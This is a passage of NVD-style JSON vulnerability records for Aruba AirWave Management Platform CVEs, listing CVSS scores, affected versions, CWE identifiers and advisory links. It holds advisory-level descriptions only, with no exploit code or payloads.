          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T16:15:13.013",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-28 20:15
Modified
2024-11-21 05:54
Summary
A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de deserializaci\u00f3n no segura remota en Aruba AirWave Management Platform versiones anteriores a la 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25152",
  "lastModified": "2024-11-21T05:54:27.570",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-28T20:15:08.040",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-01-31 20:15
Modified
2024-11-21 02:47
Summary
A vulnerability exists in the Aruba AirWave Management Platform 8.x prior to 8.2 in the management interface of an underlying system component called RabbitMQ, which could let a malicious user obtain sensitive information. This interface listens on TCP port 15672 and 55672
Impacted products



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1BF58E3A-491E-4E93-BB95-490E046D910B",
              "versionEndExcluding": "8.2.0.0",
              "versionStartIncluding": "",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0E7368A-F76A-48A7-ACBA-E788A6A379B8",
              "versionEndExcluding": "4.1.3.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:arubanetworks:aruba_instant:4.2.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE6FAE29-7941-46AA-A36E-9E190B5DFD56",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3E1323A-9E36-4F30-BB17-E7A6C203B094",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A vulnerability exists in the Aruba AirWave Management Platform 8.x prior to 8.2 in the management interface of an underlying system component called RabbitMQ, which could let a malicious user obtain sensitive information. This interface listens on TCP port 15672 and 55672"
    },
    {
      "lang": "es",
      "value": "Se presenta una vulnerabilidad en Aruba AirWave Management Platform versiones 8.x anteriores a 8.2, en la interfaz de administraci\u00f3n de un componente de un sistema subyacente llamado RabbitMQ, lo que podr\u00eda permitir a un usuario malicioso obtener informaci\u00f3n confidencial. Esta interfaz escucha sobre los puertos TCP 15672 y 55672"
    }
  ],
  "id": "CVE-2016-2032",
  "lastModified": "2024-11-21T02:47:39.190",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-01-31T20:15:10.663",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2016/May/19"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.google.com/about/appsecurity/research/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2016/May/19"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.google.com/about/appsecurity/research/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-29 11:15
Modified
2024-11-21 05:54
Summary
A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de acceso remoto no autorizado en Aruba AirWave Management Platform versiones anteriores a 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25166",
  "lastModified": "2024-11-21T05:54:29.107",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-29T11:15:09.040",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-02-27 17:15
Modified
2024-11-21 04:44
Summary
There are command injection vulnerabilities present in the AirWave application. Certain input fields controlled by an administrative user are not properly sanitized before being parsed by AirWave. If conditions are met, an attacker can obtain command execution on the host.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F8DC880-EF1E-45F3-A0B0-B4E7994C6F58",
              "versionEndExcluding": "8.2.10.1",
              "versionStartIncluding": "8.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "There are command injection vulnerabilities present in the AirWave application. Certain input fields controlled by an administrative user are not properly sanitized before being parsed by AirWave. If conditions are met, an attacker can obtain command execution on the host."
    },
    {
      "lang": "es",
      "value": "Se presentan vulnerabilidades de inyecci\u00f3n de comando presentes en la aplicaci\u00f3n Airwave. Determinados campos de entrada controlados por un usuario administrativo no son saneados apropiadamente antes de ser analizados por Airwave. Si se cumplen las condiciones, un atacante puede obtener una ejecuci\u00f3n de comando en el host."
    }
  ],
  "id": "CVE-2019-5323",
  "lastModified": "2024-11-21T04:44:44.967",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-27T17:15:11.690",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-28 19:15
Modified
2024-11-21 05:54
Summary
A remote escalation of privilege vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote escalation of privilege vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de escalada de privilegios remota en Aruba AirWave Management Platform versiones anteriores a 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25154",
  "lastModified": "2024-11-21T05:54:27.783",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.6,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-28T19:15:08.557",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 16:15
Modified
2024-11-21 05:57
Summary
A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de cross-site request forgery (csrf) no autenticada remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Una vulnerabilidad en la interfaz de administraci\u00f3n basada en web de AirWave podr\u00eda permitir a un atacante remoto no autenticado conducir un ataque CSRF contra un sistema vulnerable.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito consistir\u00eda en que un atacante persuadir\u00e1 a un usuario autorizado de seguir un enlace malicioso, resultando en acciones arbitrarias llevadas a cabo con el nivel de privilegio del usuario objetivo"
    }
  ],
  "id": "CVE-2021-26960",
  "lastModified": "2024-11-21T05:57:07.573",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T16:15:12.837",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2023-09-05 18:15
Modified
2024-11-21 02:26
Summary
Aruba AirWave before 7.7.14.2 and 8.x before 8.0.7 allows administrative users to escalate privileges to root on the underlying OS.
Impacted products
Vendor Product Version
arubanetworks airwave *
hp airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EDF36441-2D75-41BC-99A6-5AFC8B770FA3",
              "versionEndExcluding": "7.7.14.2",
              "versionStartIncluding": "7.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "87381F29-D2F9-4300-BB9F-924197154CE9",
              "versionEndExcluding": "8.0.7",
              "versionStartIncluding": "8.0.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Aruba AirWave before 7.7.14.2 and 8.x before 8.0.7 allows administrative users to escalate privileges to root on the underlying OS."
    },
    {
      "lang": "es",
      "value": "Aruba AirWave antes de las versiones 7.7.14.2 y 8.x antes de 8.0.7 permite a los usuarios administrativos escalar privilegios a root en el sistema operativo subyacente. "
    }
  ],
  "id": "CVE-2015-2202",
  "lastModified": "2024-11-21T02:26:59.530",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-09-05T18:15:08.357",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-005.txt"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-28 20:15
Modified
2024-11-21 05:54
Summary
A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de entidad externa XML remota en Aruba AirWave Management Platform versiones anteriores a la 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25164",
  "lastModified": "2024-11-21T05:54:28.903",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-28T20:15:08.070",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
